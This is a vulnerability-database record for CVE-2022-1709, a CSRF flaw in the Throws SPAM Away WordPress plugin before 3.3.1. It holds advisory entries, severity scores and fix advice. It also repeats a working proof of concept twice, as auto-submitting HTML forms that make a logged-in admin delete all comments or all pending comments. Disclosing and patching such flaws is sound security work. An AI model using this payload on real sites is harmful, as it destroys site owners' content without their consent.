Description
The plugin does not have CSRF checks in place when deleting comments (either all, spam, or pending), allowing attackers to make a logged in admin delete comments via a CSRF attack
### PoC
To delete all comments
Affected Software
Related
{"id": "WPVDB-ID:AC290535-D9EC-459A-ABC3-27CD78EB54FC", "vendorId": null, "type": "wpvulndb", "bulletinFamily": "software", "title": "Throws SPAM Away < 3.3.1 - Comment Deletion via CSRF", "description": "The plugin does not have CSRF checks in place when deleting comments (either all, spam, or pending), allowing attackers to make a logged in admin delete comments via a CSRF attack\n\n### PoC\n\nTo delete all comments \n", "published": "2022-05-16T00:00:00", "modified": "2022-05-16T07:02:01", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://wpscan.com/vulnerability/ac290535-d9ec-459a-abc3-27cd78eb54fc", "reporter": "Daniel Ruf", "references": [], "cvelist": ["CVE-2022-1709"], "immutableFields": [], "lastseen": "2022-06-15T20:35:18", "viewCount": 1, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}, "affectedSoftware": [{"version": "3.3.1", "operator": "lt", "name": "throws-spam-away"}], "exploit": "To delete all comments\r\n<form id=\"test\" action=\"https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php\" method=\"POST\">\r\n <input type=\"text\" name=\"c_all\" value=\"a\">\r\n <input type=\"text\" name=\"all\" value=\"a\">\r\n <input type=\"text\" name=\"Submit\" value=\"Delete all Comments\">\r\n</form>\r\n<script>\r\n document.getElementById(\"test\").submit();\r\n</script>\r\n\r\n\r\n<form id=\"test\" action=\"https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php\" method=\"POST\">\r\n <input type=\"text\" name=\"c_pend\" value=\"p\">\r\n <input type=\"text\" name=\"pend\" value=\"p\">\r\n <input type=\"text\" name=\"Submit\" value=\"Delete all pending Comments\">\r\n</form>\r\n<script>\r\n document.getElementById(\"test\").submit();\r\n</script>", "sourceData": "", "generation": 0}
{"cve": [{"lastseen": "2022-06-15T20:18:52", "description": "The Throws SPAM Away WordPress plugin before 3.3.1 does not have CSRF checks in place when deleting comments (either all, spam, or pending), allowing attackers to make a logged in admin delete comments via a CSRF attack", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2022-06-08T10:15:00", "type": "cve", "title": "CVE-2022-1709", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1709"], "modified": "2022-06-15T19:33:00", "cpe": [], "id": "CVE-2022-1709", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1709", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-15T21:57:06", "description": "Comment Deletion via Cross-Site Request Forgery (CSRF) vulnerability was discovered by Daniel Ruf in the WordPress Throws SPAM Away plugin (versions <= 3.3).\n\n## Solution\n\n\r\n Update the WordPress Throws SPAM Away plugin to the latest available version (at least 3.3.1).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2022-05-16T00:00:00", "type": "patchstack", "title": "WordPress Throws SPAM Away plugin <= 3.3 - Comment Deletion via Cross-Site Request Forgery (CSRF) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1709"], "modified": "2022-05-16T00:00:00", "id": "PATCHSTACK:43106DD7D3271DD2B67D8B749DE334D7", "href": "https://patchstack.com/database/vulnerability/throws-spam-away/wordpress-throws-spam-away-plugin-3-3-comment-deletion-via-cross-site-request-forgery-csrf-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2022-06-15T20:35:18", "description": "The plugin does not have CSRF checks in place when deleting comments (either all, spam, or pending), allowing attackers to make a logged in admin delete comments via a CSRF attack\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2022-05-16T00:00:00", "type": "wpexploit", "title": "Throws SPAM Away < 3.3.1 - Comment Deletion via CSRF", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1709"], "modified": "2022-05-16T07:02:01", "id": "WPEX-ID:AC290535-D9EC-459A-ABC3-27CD78EB54FC", "href": "", "sourceData": "To delete all comments\r\n<form id=\"test\" action=\"https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php\" method=\"POST\">\r\n <input type=\"text\" name=\"c_all\" value=\"a\">\r\n <input type=\"text\" name=\"all\" value=\"a\">\r\n <input type=\"text\" name=\"Submit\" value=\"Delete all Comments\">\r\n</form>\r\n<script>\r\n document.getElementById(\"test\").submit();\r\n</script>\r\n\r\n\r\n<form id=\"test\" action=\"https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php\" method=\"POST\">\r\n <input type=\"text\" name=\"c_pend\" value=\"p\">\r\n <input type=\"text\" name=\"pend\" value=\"p\">\r\n <input type=\"text\" name=\"Submit\" value=\"Delete all pending Comments\">\r\n</form>\r\n<script>\r\n document.getElementById(\"test\").submit();\r\n</script>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}